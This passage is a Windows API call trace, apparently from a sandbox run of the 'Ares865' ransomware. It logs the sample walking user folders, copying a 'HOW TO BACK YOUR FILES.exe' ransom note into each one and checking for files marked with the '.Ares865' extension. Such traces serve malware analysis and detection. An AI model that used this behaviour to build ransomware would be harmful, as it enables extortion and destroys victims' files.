dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.375] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned 73 [0090.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures" [0090.375] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.375] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.376] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.376] GetLastError () returned 0x0 [0090.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.376] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.376] CloseHandle (hObject=0x120) returned 1 [0090.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.376] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.376] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="Chrysanthemum.jpg.Ares865" | out: lpString1="Chrysanthemum.jpg.Ares865") returned="Chrysanthemum.jpg.Ares865" [0090.377] lstrlenW (lpString="Chrysanthemum.jpg.Ares865") returned 25 [0090.377] lstrlenW (lpString="Ares865") returned 7 [0090.377] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="Desert.jpg.Ares865" | out: lpString1="Desert.jpg.Ares865") returned="Desert.jpg.Ares865" [0090.377] lstrlenW (lpString="Desert.jpg.Ares865") returned 18 [0090.377] lstrlenW (lpString="Ares865") returned 7 [0090.377] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.377] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.377] lstrlenW (lpString="Ares865") returned 7 [0090.377] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="Hydrangeas.jpg.Ares865" | out: lpString1="Hydrangeas.jpg.Ares865") returned="Hydrangeas.jpg.Ares865" [0090.377] lstrlenW (lpString="Hydrangeas.jpg.Ares865") returned 22 [0090.377] lstrlenW (lpString="Ares865") returned 7 [0090.377] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="Jellyfish.jpg.Ares865" | out: lpString1="Jellyfish.jpg.Ares865") returned="Jellyfish.jpg.Ares865" [0090.377] lstrlenW (lpString="Jellyfish.jpg.Ares865") returned 21 [0090.377] lstrlenW (lpString="Ares865") returned 7 [0090.377] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.377] lstrcpyW (in: lpString1=0x2cce494, lpString2="Koala.jpg.Ares865" | out: lpString1="Koala.jpg.Ares865") returned="Koala.jpg.Ares865" [0090.378] lstrlenW (lpString="Koala.jpg.Ares865") returned 17 [0090.378] lstrlenW (lpString="Ares865") returned 7 [0090.378] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.378] lstrcpyW (in: lpString1=0x2cce494, lpString2="Lighthouse.jpg.Ares865" | out: lpString1="Lighthouse.jpg.Ares865") returned="Lighthouse.jpg.Ares865" [0090.378] lstrlenW (lpString="Lighthouse.jpg.Ares865") returned 22 [0090.378] lstrlenW (lpString="Ares865") returned 7 [0090.378] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.378] lstrcpyW (in: lpString1=0x2cce494, lpString2="Penguins.jpg.Ares865" | out: lpString1="Penguins.jpg.Ares865") returned="Penguins.jpg.Ares865" [0090.378] lstrlenW (lpString="Penguins.jpg.Ares865") returned 20 [0090.378] lstrlenW (lpString="Ares865") returned 7 [0090.378] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.378] lstrcpyW (in: lpString1=0x2cce494, lpString2="Tulips.jpg.Ares865" | out: lpString1="Tulips.jpg.Ares865") returned="Tulips.jpg.Ares865" [0090.378] lstrlenW (lpString="Tulips.jpg.Ares865") returned 18 [0090.378] lstrlenW (lpString="Ares865") returned 7 [0090.378] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.378] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Music") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Music" [0090.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0090.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0090.378] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Music") returned 54 [0090.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Music" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Music") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Music" [0090.378] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.378] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.379] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.379] GetLastError () returned 0x0 [0090.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.379] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.379] CloseHandle (hObject=0x120) returned 1 [0090.379] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.379] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.379] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.380] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.380] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.380] lstrcpyW (in: lpString1=0x2cce46e, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.380] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.380] lstrlenW (lpString="Ares865") returned 7 [0090.380] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.380] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0090.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0090.380] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0090.380] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0090.380] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music" [0090.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.380] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0090.380] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music") returned 67 [0090.380] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music" [0090.380] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.380] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.382] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.382] GetLastError () returned 0x0 [0090.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.382] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.382] CloseHandle (hObject=0x120) returned 1 [0090.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.382] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.383] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.383] lstrcpyW (in: lpString1=0x2cce488, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.383] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.383] lstrlenW (lpString="Ares865") returned 7 [0090.383] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.383] lstrcpyW (in: lpString1=0x2cce488, lpString2="Kalimba.mp3.Ares865" | out: lpString1="Kalimba.mp3.Ares865") returned="Kalimba.mp3.Ares865" [0090.383] lstrlenW (lpString="Kalimba.mp3.Ares865") returned 19 [0090.383] lstrlenW (lpString="Ares865") returned 7 [0090.383] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.383] lstrcpyW (in: lpString1=0x2cce488, lpString2="Maid with the Flaxen Hair.mp3.Ares865" | out: lpString1="Maid with the Flaxen Hair.mp3.Ares865") returned="Maid with the Flaxen Hair.mp3.Ares865" [0090.383] lstrlenW (lpString="Maid with the Flaxen Hair.mp3.Ares865") returned 37 [0090.383] lstrlenW (lpString="Ares865") returned 7 [0090.383] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.383] lstrcpyW (in: lpString1=0x2cce488, lpString2="Sleep Away.mp3.Ares865" | out: lpString1="Sleep Away.mp3.Ares865") returned="Sleep Away.mp3.Ares865" [0090.383] lstrlenW (lpString="Sleep Away.mp3.Ares865") returned 22 [0090.383] lstrlenW (lpString="Ares865") returned 7 [0090.383] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.383] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Desktop", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Desktop") returned="C:\\Users\\All Users\\Application Data\\Desktop" [0090.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0090.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0090.383] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Desktop") returned 43 [0090.383] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Desktop" | out: lpString1="C:\\Users\\All Users\\Application Data\\Desktop") returned="C:\\Users\\All Users\\Application Data\\Desktop" [0090.383] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.384] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.384] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.384] GetLastError () returned 0x0 [0090.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.384] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.384] CloseHandle (hObject=0x120) returned 1 [0090.384] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.384] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Desktop\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53c55e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53c55e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.385] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.385] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.385] lstrcpyW (in: lpString1=0x2cce458, lpString2="Adobe Reader X.lnk.Ares865" | out: lpString1="Adobe Reader X.lnk.Ares865") returned="Adobe Reader X.lnk.Ares865" [0090.385] lstrlenW (lpString="Adobe Reader X.lnk.Ares865") returned 26 [0090.385] lstrlenW (lpString="Ares865") returned 7 [0090.385] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.385] lstrcpyW (in: lpString1=0x2cce458, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.385] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.385] lstrlenW (lpString="Ares865") returned 7 [0090.385] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.385] lstrcpyW (in: lpString1=0x2cce458, lpString2="Google Chrome.lnk.Ares865" | out: lpString1="Google Chrome.lnk.Ares865") returned="Google Chrome.lnk.Ares865" [0090.385] lstrlenW (lpString="Google Chrome.lnk.Ares865") returned 25 [0090.385] lstrlenW (lpString="Ares865") returned 7 [0090.385] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.385] lstrcpyW (in: lpString1=0x2cce458, lpString2="Mozilla Firefox.lnk.Ares865" | out: lpString1="Mozilla Firefox.lnk.Ares865") returned="Mozilla Firefox.lnk.Ares865" [0090.385] lstrlenW (lpString="Mozilla Firefox.lnk.Ares865") returned 27 [0090.385] lstrlenW (lpString="Ares865") returned 7 [0090.385] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.386] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data") returned="C:\\Users\\All Users\\Application Data\\Application Data" [0090.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0090.386] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0090.386] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data") returned 52 [0090.386] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data") returned="C:\\Users\\All Users\\Application Data\\Application Data" [0090.386] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.386] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.386] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.386] GetLastError () returned 0x0 [0090.386] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.386] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.387] CloseHandle (hObject=0x120) returned 1 [0090.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.387] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.387] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x454b2140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x454b2140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.387] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.387] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.387] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1608 [0090.387] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0090.387] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x320fc8 [0090.387] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0090.387] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0090.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0090.387] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0518 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0380 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0270 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Microsoft Help" | out: lpString1="Microsoft Help") returned="Microsoft Help" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e95b0 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Mozilla" | out: lpString1="Mozilla") returned="Mozilla" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f02f8 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Oracle" | out: lpString1="Oracle") returned="Oracle" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1408 [0090.388] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.388] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Package Cache" | out: lpString1="Package Cache") returned="Package Cache" [0090.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e9eb0 [0090.389] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0090.389] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0090.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, 